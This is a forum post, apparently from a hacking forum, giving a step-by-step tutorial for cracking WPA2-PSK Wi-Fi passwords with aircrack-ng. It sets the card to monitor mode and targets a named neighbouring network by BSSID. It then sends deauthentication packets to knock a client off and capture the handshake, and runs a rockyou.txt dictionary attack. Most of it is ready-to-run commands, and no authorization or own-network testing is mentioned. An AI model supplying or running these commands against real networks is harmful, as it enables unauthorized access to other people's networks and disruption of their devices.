Login Register






The issue regarding searched threads returning 404s has been fixed. My apologies. - NekoElf
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Tutorial WPA2/PSK Hacking Tutorial - Detailed w/ Pics! (Dictionary Attack) filter_list
Author
Message
WPA2/PSK Hacking Tutorial - Detailed w/ Pics! (Dictionary Attack) #1
WPA2/PSK WIFI HACKING TUTORIAL
Requirements


Maybe I'm wrong but I haven't seen any quality tutorials on Sinister for cracking Wifi with Aircrack so I thought I would make one. (If there is correct and link it to me please)

Okay so lets get started.

First you want to open up a terminal and put your network card in monitor mode like this. This allows the network interface card to monitor network traffic and capture data packets being sent from the AP

Code:
airmon-ng start wlan0

[Image: xL843Sn.png]

Then use this command to check to see which network interface you have. My interface is wlan0mon but yours could be different. Whichever interface says monitor mode is the one that your going to want to use

Code:
iwconfig

[Image: HiwSBpo.png]


Then let's scan for targets with this command. The closer the target the better. You can see the range where it say PWR. The lower the number the closer the AP is to you. I'm going to choose the target Smith Girls.

Code:
airodump-ng wlan0mon

[Image: QrkIeju.png]

After you choose your target note the BSSID and the Channel # and type the following to monitor the network traffic. The page will look like the one below. Where the -w part is just the cap file that needs to be saved and used for later. Name it whatever you want.

Code:
airodump-ng -c 8 --bssid 90:48:9A:C4:5B:10 -w sinistertutorial wlan0mon

[Image: 183g9AK.png]

Now leave that terminal alone and open up a new terminal and type the following to send death packets to disassociate the device from the AP so that you can get it to reconnect to capture the handshake. Make sure you have the station number handy! If there is no station number when you are monitoring the network they either do not have any devices connected at the moment or you are to far away from the AP. You can see that the handshake is captured in the top right corner of my terminal.

Code:
aireplay-ng -0 2 -a 90:48:9A:C4:5B:10 -c C8:3A:6B:97:E7:FC wlan0mon

[Image: IOkluzS.png]

Once you obtain a handshake you are ready to start cracking the password with Aircrack. So go ahead and open up a new terminal and type the command below. If the dictionary attack contains the password for the router then you will get a page that looks like this

Code:
aircrack-ng -a2 -b 90:48:9A:C4:5B:10 -w rockyou.txt sinistertutorial-01.cap

[Image: JkqkgRF.png]

The rockyou.txt part is the dictionary file that is built in with Kali LInux that you can use. You can download different dictionary files off the internet and use those if the built in dictionary that Kali Linux offers does not work. Once it runs through the dictionary it will tell you if you found the password or not. In my case it found the password rather quickly.


Hope you guys enjoyed the tutorial. I tried to make it as basic and simple as possible for someone to understand that isn't familiar with Linux.


Turn Off Monitor Mode!


If you don't turn monitor mode back off you cannot browse the internet. Do so by typing the following command

Code:
airmon-ng stop wlan0mon

If your having trouble and the Wifi icon at the top right of the screen is gone then type

Code:
service network-manager restart

After that everything should work perfectly!


Hope you guys enjoyed the tutorial thanks for viewing! If you have any questions PM me!
(This post was last modified: 01-01-2019, 11:09 AM by VilePyromancer.)


Reply





Messages In This Thread
WPA2/PSK Hacking Tutorial - Detailed w/ Pics! (Dictionary Attack) - by VilePyromancer - 12-24-2018, 08:16 AM



Users browsing this thread: 6 Guest(s)